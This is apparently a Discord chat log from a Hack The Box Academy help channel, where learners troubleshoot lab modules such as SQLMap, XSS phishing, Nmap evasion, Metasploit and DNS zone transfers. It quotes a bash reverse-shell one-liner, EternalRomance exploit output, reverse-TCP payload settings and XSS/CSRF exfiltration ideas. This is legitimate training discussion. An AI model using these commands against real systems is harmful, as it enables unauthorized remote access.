#modules
I read this like 10 times and didn't know what they meant: When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication and authenticate against the users created in the SQL Server. Instead, if we define the domain or hostname, it will use Windows Authentication. If we are targeting a local account, we can use SERVERNAME\accountname or .\accountname. The full command would look like:
that makes sense to me
let's switch brains please
think about it this way, one is windows auth which is the same account you use to log into your windows computer. the other one is a login for a service, sql, which is separate from your windows logon because it's provided by the service
just like your discord login is different than your windows login
but you can set up sql to auth to your windows account instead of the sql server account
that makes sense, i just didn't realize there was a flag you could use to specify
now go get that flag
i really hope so, i've been on this module all day
got the flag, like three hours longer than i would have liked due to the windows auth fiasco
but now you'll never forget
SQLMap Essentials - skill assessment: i need help with this. i already got the attack vector, bypassed the filter and managed to see two databases, but cannot continue to FLAG
NVM there was a typo in the FLAG db
Hi everyone,
I am doing the "Phishing" section of the "Cross Site Scripting" module: https://academy.hackthebox.com/module/103/section/984
When I use the exact same payload as shown in the reading material, I get slightly different rendering. So, I changed the payload a bit and added <script> to it so that the end rendering looks like (see attached). I have a webserver running on my end and I have also tried sending test values. I do receive these values on my end. However, when I pass this URL to send.php, all I get is "Issue in sending URL". I am not sure what I am doing wrong 😦
Do t0 modules give back the cubes that are spent?
Yes
What about t1?
20%

Hi guys, i am currently working through password attacks and i am stuck on the hard lab, so here is the situation. I got the SAM and SYSTEM files, so i extracted the hashes, but the problem is that multiple rows have the same hash, so i tried to crack the hash and i got blank. So I tried to insert it directly, it didn't work, and i also tried multiple PtH techniques and none work. Can someone help?
Look at the HTML source code and think about where exactly you are injecting your payload.
Do you have the right files? Have a look to see if there are any others
I know. It's in the image src attribute. But I got everything right. I also checked the hint and it says to test the login form that we inject beforehand. And it works. But why does send.php give me an error?
I am pretty sure, i downloaded the Backup drive, mounted it, extracted the SAM and SYSTEM files, used samdump2 to dump hashes, and got a blank hash that doesn't work when trying to pass the hash
Will you still get a cookie? If so, the error message doesn't have to bother you. If not, your payload is not yet correct.
Look at the number of backups
No. Wait, shouldn't I be getting username and password? Or just a single cookie?
username and pass
So as not to spoil anything, send me a DM
i used netcat to catch it
Sure
just did this 10 mins ago
did you add a url parameter?
What do you mean? I get only one backup file that i mount
Oh, I probably mixed it up. This is the task with the vhd file, right? Yes, then there is only one file.
Thank you so much, it worked
Footprinting is taking me way too long to finish
hey guys, could anyone please hint me with this one? I'm stuck
okay disregard, I just had to write the change I've made in hexadecimal
This is a good one lol
Hello, i got a problem with Network Enumeration with Nmap / Host and Port Scanning. Can someone help?
I submitted the flag "case-sensitive" but it doesn't accept it
Have a bug report in #1234357888114364508 about exactly that.
thanks a lot
Hello, I'm still new. Where can I chat? General is closed, can I talk there?
Read and follow #welcome
What's this server for
academy
lmfao what’s that from?
Again, read #welcome Everything will be explained to you there
Ohh thx
Hi, i'm working on Network Enumeration with Nmap / **Firewall and IDS/IPS Evasion - Hard Lab** on my own. i know that to bypass IDS/IPS you need to scan the target at the lowest speed, so i used the -T0 and -T1 flags to find this service's version, but nmap debug mode told me about 8 hours to complete lol. Any tips?
-T4
-T4 is not intrusive?
Pretty aggressive but it will speed it up a lot
clear
I recommend using -T4 when scanning reasonably modern and reliable networks. Keep that option (at the beginning of the command...
-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports and -T5 caps that value at 5 ms.
So you need a real fast connection to use -T4
clear, what am i doing wrong?
T0 is the slowest scan, also referred to as the "Paranoid" scan. This option is good for IDS evasion
If u rlly paranoid
yeah i know about these flags but took me 8 hours
i just stuck on this
read module again
Cause its slow
there should be a script or some flag that enum hostname
i dont need to enum hostname
With -sC
@hexed tartan what the question
||Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. ||
-sV
i did lol
the question, not a hint
This is the question bro
.
but -sV is the answer
/usr/share/wordlists/rockyou.txt
if there is an smb service, then you should use some script I believe
Rockyou is in a zip
gunzip rockyou.txt.gz
the machine is "Hard" so i can expect everything lol
Permission denied
sudo
i already used -p- for scan all ports
only found are 22 80
yes
np i m more than u
Utilize some of the scan techniques referred to in the "ids/ips" evasion reading, substituting the specific port for all ports
i tried some databases port like 3306 this way i was looking for
might be redis? idk im trying
btw which hash is this 93c887ae8200000052f17511d0fd3b9a08350b045e118a2cd0c311777576080bc13a5581d522cdb5a123456789abcdefa123456789abcdef140561646d696e:3541221bac8d7e76f34e45697aed40edfbe87fd8
what does it belong to
Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data. --> only thing that come in my mind is a service database port
Nope, don't look for specific ports on your own
Ignore specific ports
Just scan for all ports using some of the techniques referred to
What academy module is this related to?
Doesn't using -T1 make it slow af?
It is. I wouldn't recommend T1 but there's a technique from the reading that will reveal the right port
in the labs the module scans specific ports, that's why, but ok i'm going for -p- instead of
Hmmm, ok²
In the instances of specific ports it's mostly for direct demonstration instead of loads of nonhelpful info
footprinting
BMC
section
i got it
BMC???? That doesn't sound familiar
hmac sha1
You mean ipmi?
yea mb
The section tells you what mode to use
And even if you search example hashes in hashcat for ipmi you'll find it
yea i cracked it
Hey guys, I'm just getting to know tech and I'm interested in going into cyber security. Please, where can I start so I get good starting knowledge?
but i just wanted to find which algorithm it was from
if i use -A i'm ripped
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
i didn't read the output properly
Don't use -A then
Yeahhh that happens
i tried using crackstation first but didn't get anything
You can likely reset the target and it'll be faster than waiting the timer
ok thanks
But look at all the techniques specifically from the section prior to the skill exam
Please any help
i tried decoy, probably is filtered this port idk i'm looking for syn scan filtered port
@coral trout
Are the skill assessments enough to pass the exam?
Or u need to do extra boxes as well
If you have understood all the attacks discussed in the modules and know why they work the way they do, then you are ready for the exam.
Otherwise, it may be useful to read through individual topics again or try them out in machines
Thanks
DONE finally
idk why decoy doesnt work i used --disable-arp-ping too
and worked
he found the filtered
Hey, in the web attacks skill assessment i found a uid for administrator. Can i modify the request to be administrator from the htb student account that i am in now?
I don't know how to get the token for administrator so that i can modify a GET request to kinda get to the administrator panel
When you log in as a user, take a look at how exactly this user gets the token.
Got it, changed the uid in storage and voila. i was stuck here for some time
Attacking Common Services > DNS
||I see the subdomain containing the flag does not allow queries. It only allows zone transfers. Can you even capture this flag with subbrute or dnsenum in this lab? DM's are open if discussing in public is a spoiler minefield.||
Okay, I need a little bit of help now. I have been trying to do the 'Metasploit Fundamentals' module, and I am stuck on the 'Modules' section. I have been working on this for days, I have set the appropriate RHOST, the RPORT is correct, I was doing it on a VM, so i figured maybe my metasploit was messed up.
I have updated it, uninstalled and reinstalled, reloaded from VM snapshot. I have tried using the eternal romance and eternalblue exploits. And yes, I was setting LHOST to tun0. I have cancelled and rerun openvpn many times, I have installed new files, I have used different servers, I have terminated and respawned the target (and yes, I changed RHOST when I respawned the target.)
Eventually I gave up on using my VM and tried to do it via pwnbox instead, figuring that I can figure out what the difference is between the two later. Pwnbox did not work either. I left my LPORT and LHOST as default because the pwnbox doesn't use a vpn. I have the right RHOST. I have tried different LPORTs and I know that the EternalRomance exploit can be a bit finicky, so I have repeated it in case of connection issues. If I am lucky, I get the following output:
' [*] Started reverse TCP handler on 94.237.50.148:4444
[*] 10.129.179.36:445 - Target OS: Windows Server 2016 Standard 14393
[*] 10.129.179.36:445 - Built a write-what-where primitive...
[+] 10.129.179.36:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.179.36:445 - Selecting PowerShell target
[*] 10.129.179.36:445 - Executing the payload...
[+] 10.129.179.36:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. '
I have tried doing this independently, I have tried looking up people experiencing the same issue, and I have even tried doing it via HTB's Pwnbox, and nothing works. I would greatly appreciate some help.
try to change vpn
I actually don't have any notes from that module. Is there another similar exploit down the list? I remember encountering this and the solution was to move onto another similar exploit. One doesn't work, the next does.
Hi, i need help with the module Attacking Common Applications, part osTicket. I don't fully understand where to go after I looked at the ticket I created
i found llfreight@access1! but it doesn't work
if it already has low latency, i don't know then
There is an auxiliary module, however I think it just checks if it is vulnerable or maybe reads files. I believe you need a full-on reverse shell to get the flag without yards of guesswork
How many hrs a day should I do htb A to finish cbbh in 8 months? pls reply or @ me as I'm going to sleep rn
Give me like 20 minutes and I'll fire up the module to take a look; see if I can figure it out again and give you a sanity check.
Thank you so much! I really have tried to troubleshoot and sort it myself, I know that I'll never learn anything if I always ask others for the answers, but a week later and so many attempts, and even defaulting to the pwnbox which doesn't work, I can cop to needing some help
Look for the ticket that they refer to after you successfully log in
this?
There's a search feature
You have to sign in though
As noted by the message above
From the sample output with the 2 users and passwords one of them should work
Hey, i changed the password for admin using a burp GET request in the skill assessment section of web attacks but i don't see any change on the main webpage
You logged in to the admin account?
Yup
Yes, I did everything. It's just that I used too many wrong attempts, I needed to change the IP. Ty
I changed the uid in memory and it shows me as administrator on the main page
There should be an add event button or something like that on the admin page
Noo
Not seeing any changes in the page even after i changed the administration password
You changed the password so just... log in? Lol
Yes you are right i never thought
How's life in these parts of the server?
same
So yea this is pretty straight forward for me. If you want to share output from SHOW OPTIONS I can look for anything unusual in your setup. It's really as you describe: set RHOST set LHOST and go. I used the psexec variant.
DM's open, that might be easier than dumping screen shots in main
Wait... I think I see the problem...
Started reverse TCP handler on 94.XXX.XX.XXX:4444
This is definitely not tun0 if you're on the VPN. Somehow you're opening a reverse connection on a public IP? Whoops?
I'm... uh... guessing she went offline lol.
footprinting
ah sorry, not done it
bro really said trust me bro 
Hi, sorry, I was having a meal, DM sent
real but can't expect people here to know how to use docker 
shut your trap buddy unless you want some of these
Okay, for anyone looking for help on this issue, here is what I managed to do on my VM to make the shell work. Truth be told I do not know which of these changes resulted in my eventual success but here are the changes I made that must have helped me succeed.
First, I redownloaded the VPN Connection file, however I downloaded it from a lower load server, and I downloaded the TCP file instead of the UDP to help in case of packet loss.
I then terminated the target machine and spun it up again.
Lastly, I reconfigured my metasploit console, I changed the payload from the default Windows payload to a generic payload, because this was the message I noticed after restarting msfconsole
No payload configured, defaulting to windows/meterpreter/reverse_tcp
I then used the show payloads command, and decided to use payload 4
payload/generic/shell_reverse_tcp
Finally, I set my LHOST to tun0 again, for the new VPN file, set RHOSTS to the new target machine, and ran it with success. Good luck!
Hi everyone, i'm doing the introduction of Windows event logging basics (windows event logs). The exercise consists of finding the event with ID 4624 that took place on 8/3/2022 at 10:23:25. The answer should be the name of the executable responsible for the modification of the auditing settings. I found in the event details only the reference to "services.exe". Therefore, the answer's pattern should be "TW__.exe"
Any suggestions?
did HTB remove the Intro to AD module?
thanks mate i got it
Module Attacking Common Applications (Attacking Thick Client Applications): i can't find 0000000000003000MAP-RW--
Did you set the exit breakpoint before running the application
in preferences yep
... I hate to break it to you
That's entry breakpoint... not exit breakpoint
I looked at the photo 5 times in the module. 🫣 Ty
As a word of warning, the thick client section sucks. Suggest to use the writeup for 'Fatty' to struggle through it
ok 🫡
I did not. I regretted it
@fathom pendant hey man, would you humor me with an embarrassing question... i'm trying to understand why redirects are used twice on cmds like bash -i >& /dev/tcp/10.10.10.99/1337 0>&1. chatgpt/c.ai no help
both ai's gave me opposing answers of course
Overall module, great- fantastic even. Thick Client section and the third skill assessment
and further when you should use two and when you should not? i guess that will be apparent when i better understand it?
Bump. I'm still trying to figure out if I learned anything of value from this exercise. I can't imagine this scenario in the real world, but if anyone who completed this lab has wisdom to share please do.
Think about it this way: you're more or less defining where the file descriptors are being sent
0: stdin
1: stdout
2: stderr
Thanks, I did get the flag. I just don't know if I should revise my procedures or not. This seems like a really artificial scenario.
Redirections (Bash Reference Manual)
if you like PM me your solution and i'll tell you if its how i solved it, i just did this one a week ago or so
Sure, thanks ok.
so i get this part, but i dont understand the placement... is there any importance to it? why not just do them all at the end? does that matter? i just dont get why its there twice?
Sometimes you'll find interesting info sitting on txt records bc laziness, or even subdomains you otherwise wouldn't have thought to look for
you're redirecting first, stdout and stderr (to?? stdout?) then redirecting stdout and stderr to /dev/null... which would supersede stdout?
because the redirect isnt parsed until after the cmds are executed?
dnsenum does some voodoo magic to get the result
Sure, in this case queries are completely disabled for that subdomain. Whereas dnsenum would normally be my go-to tool, it skips the subdomain in question as a result.
In the last one, according to the manual is redirecting all 3 to stdout
So that it displays stuff in output
in output and /dev/null? this is seriously confusing ill look at the manual but i remember reading it previously maybe it will make more sense now
You need the right wordlist
No
Question, am I allowed to add htb academy work to my website portfolio
oh god i get it now
What do you mean by that?
Like screen shotting me working with certain tools and such and speaking about it on website/github
Part of HTB content guidelines doesn't allow posting of academy content for modules t1 or higher
see this has been the bane of my existence... these redirect operators they work opposite when nothing is next to them, if i remember correctly (and understand what i just read in the manual) ... this always fucks with me
Ohkay ty
`Note that the order of redirections is significant. For example, the command
ls > dirlist 2>&1
directs both standard output (file descriptor 1) and standard error (file descriptor 2) to the file dirlist, while the command`
am i understanding that correctly? maybe that has nothing to do with what im talking about
3.6.8 duplicating file descriptors
ah, you da man
seems like i need to re-read this whole thing i prob got glazed over and didnt finish the chapter
It's duplicating the file descriptors to the tcp connection
The "file" in this instance is the tcp connection /dev/tcp/ip/port
Soft reminder everything in linux is a file
ok that makes sense
reading the example part in that subsection you just mentioned... jesus... they're redirecting errors from files used as stdin and using it in the example explanation...? how can a file have errors, and we're talking exit code errors here, right? or those plus any other errors?
or is it redirecting errors made when running the cmd from a file used as stdin? i just don't get why you wouldn't redirect those errors to stdout in that case... this makes little to no sense
nvm
i need to re-read this whole thing, again, then re-read it again
Because technically without any redirection, you're not gonna get feedback on your command
but i do feel like i understand what i need to, at the moment.
And it will error without you knowing
gotcha, this has been illuminating
As long as it's tier 0 content you're fine
i freaking get it now, fingers crossed i dont forget.
Elaborate
Anyone did the TLS/SSL attack module on CWEE path
I am getting this error when trying the Heartbleed section. basically, any lab using the TLS-Breaker tool
This is the error I am getting
Check jdk version
I think it works with jdk-11
Yo
java -version
openjdk version "17.0.11" 2024-04-16
OpenJDK Runtime Environment (build 17.0.11+9-Debian-1deb12u1)
OpenJDK 64-Bit Server VM (build 17.0.11+9-Debian-1deb12u1, mixed mode, sharing)
Let me install in Pwnbox if it allows
Yeah , you are correct
running using java11 solved the issue
Java-11 executable is at /usr/lib/jvm/java-11-openjdk-amd64/bin/java
It is already installed
Do academy referral links work if I invited a friend who already had an academy account and bought a sub?
Or only for new new members
Hello, I'm working on the phishing section of the XSS module. Everything works perfectly, except when I try to send the URL through send.php. It tells me that there was an issue sending the URL. I've tried several different ways; could the module be malfunctioning?
Hello, i'm stuck on this: Information Gathering web edition / Virtual Host. i found 2 subdomains using gobuster. after i added all the subdomains found to the hosts file i tried to find another one, but i couldn't find anything. some help?
did you add the ip/domain to hosts file?
Only for new users
yes
hang on. send that screenshot again. you don’t need separate lines for subdomains
In DMs please.
yeah DM me
waiting for help thanks 🙏🏻
I believe @hushed sail wants to help, g0b said to take it to DM
yep i wrote him but he is offline actually <.<
i forgot i have DM requests turned on. my bad friend
Discord doesn't notify for dm requests generally
@fathom pendant do you know why it shows me no password hash loaded? i have changed the format but it always shows me no password hash loaded
This doesn't look like an academy module related question
It's likely though bc the hash itself is what's before the : so john isn't recognizing it
how to crack it if i have a hash and the salt? @fathom pendant
what academy module is it related to and have you tried GPT and google? ¯_(ツ)_/¯
some of the content/wording in the modules is...interesting. In the intro to Linux package management section they mention installing 'git', then talk about impacket for a few paragraphs, then say 'now that git is installed...' o_0
Hello everyone can anyone help me pls
module:Using Web Proxies
skills assessment
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I did everything but it didn't work
step 1: make sure the cookie is selected to be replaced
step 2: in the payload options, add prefix then paste the 31 character hash you found
step 3: in payload options re-encode the cookie in the reverse order you decoded it in
Hello I am on kernel exploits, linuxprivesc. pls help
Hello. Is anyone available to give me a hint in the Skills assessment of the 'Advanced XSS and CSRF'? Stuck on the file upload. Tried multiple extensions and even changed the Content type
For Windows Privilege Escalation/Citrix Env Breakout
How do I exit full screen from the Citrix environment. I am stuck, not being able to transfer the tools required for privesc
did you mean I have to set base64-encode in payload processing?
yes
all the steps i stated are in the payload processing part
adding prefix, and re-encoding
remember to get to that 31 character almost hash -- you decoded twice
so you have to re-encode it in the reverse order
why i cannot send image
i want to show
Had to go fullscreen into Remmina to see the drop-down menu
Nvm that's remmina's drop down. How do I exit this citrix environment to the host...
I did but not worked
I added the last character ....79a17a§a§ then I added "alphanum-case.txt" in payload settings
then I added the prefix with the hash I found, then I added base64-encode
but it didn't work
because in that case you're only just messing with the last character...
you need to use the whole cookie value
because again; the cookie needs to be in the format you found it in
before decoding
I have to use full hash ?
yes
shells and payloads skill assessment host 1
found both upload points
on the one, although it uploads the .aspx, i can't access it afterwards by browsing to the upload configuration path the same way as described in the module
on the other i can't upload the war file and i get a 403 error because "Manager is only accessible from a browser running on the same machine as Tomcat"
Found some writeups that didn't encounter any of these. any idea what might cause these problems?
can someone please help?
why not just upload a .war file?
That's what i am trying to do and i get the error
did you sign into the Tomcat Manager from the web?
yes
then you should be able to upload it directly from the manager page
¯_(ツ)_/¯
no fancy crazy nonsense
I know but i am not ...
i don't recall ever encountering that 403 error
i just remember generating the war file with msfvenom --> logging in --> uploading
ATTACKING COMMON SERVICES/Attacking DNS. I keep waiting for one module that doesn't get me stuck. I can't find any DNS records for inlanefreight.htb, been at it for two hours now. I found 6 records using subbrute for inlanefreight.COM but nothing for .htb, i am lost. Dig doesn't work. Dig AXFR doesn't work. Subbrute doesn't work.
you need to specify the nameserver with @spawned_ip
because .htb isn't a valid tld, without specifying it's trying to query public nameservers to find it
inlanefreight.com on the other hand is a publicly hosted website
so public nameservers can find it without needing to specify it
like this?? dig AXFR @10.129.217.140 inlanefreight.htb
yeah i think that works, try it
dig AXFR @10.129.217.140 inlanefreight.htb
; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.217.140 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
nope
i just ran the same exact command worked no problem
make sure you specify the correct name server IP
is that not the spawned target ip?
also make sure you don't have anything in your /etc/hosts related to inlanefreight.htb
it is, the target you spawn is the name server for this lab
whatever the IP is that popped up when you spawned the target IP
still not working: dig AXFR @10.129.217.140 inlanefreight.htb
nothing regarding inlanefreight.htb in /etc/hosts file, and verified this ip is the spawned target IP
try restarting the target
ok
also you seem to have an old version of dig, maybe update your box
i'm using 9.20.1-1-debian
if he's using parrot that's the latest on parrot
using parrot pwnbox, restarted target box and instance: dig AXFR @10.129.237.204 inlanefreight.htb
; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.237.204 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
@fathom pendant sorry for tagging you directly but do you have any idea about how to fix this error?
does your /etc/hosts file have anything inlanefreight.htb in it?
haven't done that section
but it looks like you compiled it with the wrong glibc
if you compiled it on your system, it used your system's glibc
no it does not, i'd paste a screenshot if i could
oh ok. I will try to compile it directly on the target then. thanks
either way weird that it's not doing the axfr
are you using the provided attack box or your own vm?
provided attack box
.
i'm assuming you're not also weirdly running the vpn on your own machine
correct
maybe try terminating the attack box, doing a hard refresh on the website, re-spawning the target after the hard refresh, start up the pwnbox, and try again
what wordlist did you use?
i found it in 5 seconds
the dig command doesn't use a wordlist
he said he didnt find any subdomains with subbrute
its just an axfr request
i used this command when i used subbrute: python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
but let me try hard restarting the pwnbox now
let's tackle this one step at a time
❤️
the first issue being: the base axfr not going through in the first place
when it absolutely should
the subbrute doesn't come in until the end
hmm
shut down the browser, hard reset everything, just spawned: dig AXFR @10.129.185.250 inlanefreight.htb
; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.185.250 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
can you switch regions with the pwnbox?
i always use the vpn, i think downloading a vpn file in a region will change the lab region? not sure marcielee probably knows though
i could terminate the pwnbox and change location, should i try UK or something?
¯_(ツ)_/¯
i don't use the pwnbox often
only when i'm lazy/don't already have my vm running
i guess i need to just take the time to download a vm on my desktop, cause this has been so time consuming as of late
tbh it's a much better experience
im confused why its not working for me either
i just spawned the pwnbox and tried, works fine
glad i'm not the only one haha misery loves company
i'm going to try the uk first, then i guess set up a vm if it doesn't work
US-academy-2 seems a bit laggy atm or at least slow(ish) on spawning
tried CA and UK with no luck
wait are you doing footprinting/dns or commonservices/dns

subbrute is the way to go though
lmao
thats what im saying
ATTACKING COMMON SERVICES
ik where you're at
i was talking about the other braincell helping 
yeah just remove and make a new resolvers file with the target ip
yeah it's intentional to not be able to axfr the base domain
but you can axfr to the domain discovered via subbrute
it worked when I compiled it on the target. thanks
wait, so should i not be worrying about the dig axfr not working?
not on the base domain
If my student subscription is about to end and I'm halfway through a module, will the module lock when the sub ends? If so, will it lock on the same day the sub ends?
find other subdomains first
using subbrute right?
yeah the same command u were running before
just have the target ip the only entry in resolvers.txt
Same module I brought up earlier. Attacking common services > DNS
It's a silly, synthetic scenario IMO.
Bind is configured to disallow querying, but allow axfr.
In my experience, dnsenum and subbrute alone won't do it. He's on the right path using axfr tho.
python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
The result here is that the end point in question will not respond to anything, but you can axfr the records inside. It's just setup to be a trick.
the command is getting stuck after revealing inlanefreight.htb
in this section specifically subbrute is the way to go
misconfigurations happen
it's not getting stuck
it's going through the names.txt list
If you tell me how to get the flag with subbrute I'd very much appreciate it.
just be patient
oh wait i'm just not patient
how long do i wait? until it's done?
what subbrute does is basically fuzzing, i haven't dove into the source code to be entirely sure
i'd say once it starts giving you some output, you're on the right track
just try to zone transfer the domains while its running
try each domain in another terminal while you wait
smart
got the flag ❤️ ❤️ ❤️
gz ez
my main problem was not putting the target ip in this line echo "ns1.inlanefreight.com" > ./resolvers.txt
yeah the ns for inlanefreight.com won't do shit for inlanefreight.htb
they are separate domains entirely
so but how was i supposed to know to put the target ip there?
think of resolvers.txt as a pseudo hosts file
if you don't know the nameserver, it doesn't hurt to use the ip
thats the only name server
Now that you have the answer you can also ||ssh into the box and take a peek in /etc/bind|| 😆
i have no energy to do this atm
no need to... but if you did you can find the flag there too.
i mean an alternative i believe is doing an nslookup for it nslookup inlanefreight.htb spawn_ip
then put that nameserver in your hosts file and use that in the resolvers file
¯\_(ツ)_/¯
but it's 100% doable with subbrute as shown just now
not to mention you won't always have access to the box that's running the configuration
```
nslookup inlanefreight.htb 10.129.9.221
Server:   10.129.9.221
Address:  10.129.9.221#53

*** Can't find inlanefreight.htb: No answer
```
so knowing how the tool works
Wait, is it? You still had to dig axfr the subdomain, didn't you @novel lynx
this will basically tell you the NS is the ip
yeah i didn't say you didn't have to dig it
yes i did
Oh ok, misread
it bruteforces a list of words to test for subdomains on a server
can't be bothered to dive into the source code to see what it actually does under the hood
ya i guess i need to start inspecting tool documentation more often
sub[domain]brute[force]
thanks for the help though everyone! it has been one rabbit hole after another for me lately
Happy hacking!
"Happy"
"hacking"
I'll race you through SMTP now 🤓
gotta go to the gym, but i'll be back at it later tonight ❤️
💀
The passwords don't change every spawn
There's only one valid login for the users
password attacks
hydra just printed 4 ones
And each service has a unique user
for one user
which part
Then you're doing something wrong :p
Network Services
What could I have possibly done wrong? I changed the IP and gave the username.list from the resources.
Either way, try to avoid posting screenshots since the module is not t0
I don't recall hydra giving false positives though
Try changing vpn regions
Hey all, I'm still learning. I'm on "Learn the basics of Penetration Testing" Tier 1, but a box is giving me a headache. Is it okay to ask about it here?
it's spoiler free
That doesn't sound like an academy module
If it was spoiler free, it wouldn't have been removed
It's a module > t0
It is LAB yea, the "Three"
Try with nxc instead of hydra, see if the results are the same
#starting-point read and follow #welcome to access
welp, need to find my identifier first lmao
This channel is for the learning modules on https://academy.hackthebox.com
Your identifier is on your account settings page
It's not emailed or delivered to you in any form
The screenshot showcases hydra giving false positives how could this be against any tos?
Sorry for it. 😅 found it
I am stuck at Skill Assessment II - Deserialization Attacks, any hints?
Try changing vpn regions, respawning the target, and trying again
I'm trying rn but it might take a while, cause this module likes to take long on purpose
@median gale i got it
u shouldn't need the user.list if you check who has rdp permissions with winrm
Eh that's not really taught in this module
And the expected way is via bruteforce
Hi guys, I'm really really stuck at
Skill Assessment - Advanced XSS and CSRF Exploitation, any advice? I was able to get the moderator upgrade but I can't make anything work from that point
oh yeah
Though creating a userlist from C:/users/ isn't a bad idea
I believe that's what I did and started deleting from the new list
Tried Europe 3, 4 and 6 and I keep getting destination unreachable. Can only connect with Europe 2
You'll need to respawn the target after changing vpn region
It respawns automatically
How do you do that?
but even then the user I get with hydra is always the same; his password varies and is never the one
well getting a different role means the new role may have new privileges you didn't have before
Hard restart didn't change anything
i did net localgroup > net localgroup "Remote Desktop Users"
u can just use the wordlists tho
if he's continuously getting false positives something is telling me it's something up with the environment being spawned for him
You did these where ? Not sure i understand
winrm
with the user you have winrm for
yeah probably
LOL sharing flags is definitely a no-go
How will i proceed?
the module is a writeup
yeah
it's the environment spawning for him
i'm not getting any false positives running hydra on a spawned target for me
US-2
Oh yeah yeah I know, I'm able to access task.php and send a script from that point. Since it has CSP I assume that I need to upload a file using the file upload functionality, then call it from tasks.php, as it should bypass the CSP since it will be a script within the app, but it's not working... NOTHING is working
also try terminating then restarting the target to ensure no weird backend shenanigans
i know the username, what i dont know is the password
wym
i also found it funny that doing this, i actually got "potentially valid account but not active for rdp" for the previous users 
Yes shame
user name to rdp or winrm?
yep did it twice and got the expected result
no weird false positives
so it's 100% the spawn environment being broken for you
it's weird that when you change vpn regions and respawn the target though it doesn't let you try and connect
but like i said you may need to Terminate, then restart
not using the restart button
Has happened to other modules as well when i tried to get a faster connection
you on the pwnbox?
to rdp
oh yeah changing the vpn region when using the pwnbox is annoying
no running local
then use the password list with the user
also when you changed vpn region, did you redownload the vpn pack?
that's exactly what i do
And you stopped and restarted the vpn with the new pack
ctrl c, new file with openvpn
Send the screenshots
Like I said it worked fine for me on my own machine on us academy 2
sounds like you need to review your code then
🙌 okay thanks for the hint then! I was expecting this reply/confirmation... fuck
Terminate then start?
well you can exfil to the exfil server
Also not being able to ping isn't always a sign that it's not working
Generally by default Windows blocks ICMP echo requests
This box doesnt though
I can't reach exfil. I tried a lot of things, but in burp it seems the request is flying out; even with the dev tools I can see it within the network tab, but I don't have any new log on exfil.htb/log, even with burp collab
Did you get any error when trying to run hydra against it?
Yes, it runs, prints a couple of false positives and then becomes unreachable
maybe i'm confused how far you are then. i thought you said you had moderator status.
try "sudo killall openvpn" and start the vpn again
thats what i usually use to stop it
Seems like overkill
It's to ensure no weird rogue openvpn processes are running
Which may be clogging your routes
Yeah sorry I'm not a native speaker, emm I did the open redirect + CSRF to get the moderator upgrade.
Then I got the access to write on task.php. Since it has CSP I can't send anything out, but using the open redirect it may work (I tried it and nope), hence I decided to use the file upload functionality to store the XMLHttpRequest script/request there to be called from task.php.
This is what I tried, lots of different ways to write the same scripts. Same ideas: get admin.php content with a GET request and send it with a POST to exfil, nothing is working
that's why i said it's probably something with your code
you should probably delete your msgs though, it's giving a lot away
Hello.
Can I have some help please for the "Active Directory Enumeration & Attacks" module ?
I'm performing the "Attacking Domain Trusts - Child -> Parent Trusts - from Linux" and I'm stuck on answering the question.
Thanks
which question there are 3.. maybe say what you're stuck on
No it's the linux part there is only one
ahh yeah i see
i was looking at cross trusts
they give a one liner that does it all
Yes but I was trying on my own
that's the one where you gotta raise the child yeah?
to do it from your machine instead of the parrot machine that's on the network you'll need to pivot through the network afaik
it's pretty step by step
unless i'm fully misremembering
either way works, i did it without pivoting
thanks it worked I was making a stupid mistake... I'm good with HTB for today I think 😅
hello
you should delete those pics as it's a t1 module
how am I going to show the errors without proof? And it's just 1 photo of the specific problem.
if you believe there's an error post in #1234357888114364508
you can just link the page and describe the issue too
@cloud urchin got the flag for SMTP 💪 needed help from gpt to figure out how to login to the email. Thankfully it didn't steer me wrong though.
chatgpt is a powerful tool if used correctly
beat me to it 😉
Agreed. It also sends me down many rabbit holes. It's definitely a give-and-take relationship.
just need a sanity check on Advanced XSS and CSRF Exploitation - Misc CSRF Exploitation exercise. after logging in, am i supposed to be redirected to /login.php?
can you see where you're supposed to be redirected in the response?
it's supposed to be /profile.php, but i get 302 redirect to /login.php
login, server-side redirect to /admin.php -> /admin.php client-side redirect to /profile.php -> /profile.php server-side redirect to /login.php
i don't think i get that when i log in
wow...the uh... Misc section of Linux Privesc really is that simple huh... not much to it...
the exercise might be borked then
that wouldn't stop completing the exercise
i just completed the exercise without issue
i never got redirected to login.php after logging in, but it doesn't matter for this anyway
Please I need a guide. I'm just a beginner coming into the cyber security space with no prior tech knowledge
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I'm looking for someone who has done the module Web Attacks, specifically the advanced file disclosure. I am stuck with the files not showing up, just a blank page. Any assistance would be amazing
OK so it did stop me from completing it because i needed to access /profile.php to get the flag
i cleared my cookies and i was able to access the page
maybe i misunderstood what you were asking
How do I find the common date on which all returned events took place on Elastic Stacks? I've tried everything for this module, however I cannot seem to figure it out. https://academy.hackthebox.com/module/211/section/2276
it's all good, got the flag in the end
no one is monitoring this chat 24/7
I figured it out. It was quite intriguing to say the least. Had to create a bar chart with the horizontal axis being @timestamp and changing the interval to @timestamps per day and then finding the most timestamps per day. I found it on 2023-03-05.
the question could be worded better, but it's a very simple question
you don't need to do anything involved to solve it
Hi I'm having trouble with meterpreter section of Using the Metasploit Framework module. When I try scanning with nmap within metasploit it says database not connected. I looked to see if postgresql is installed and got this:
```
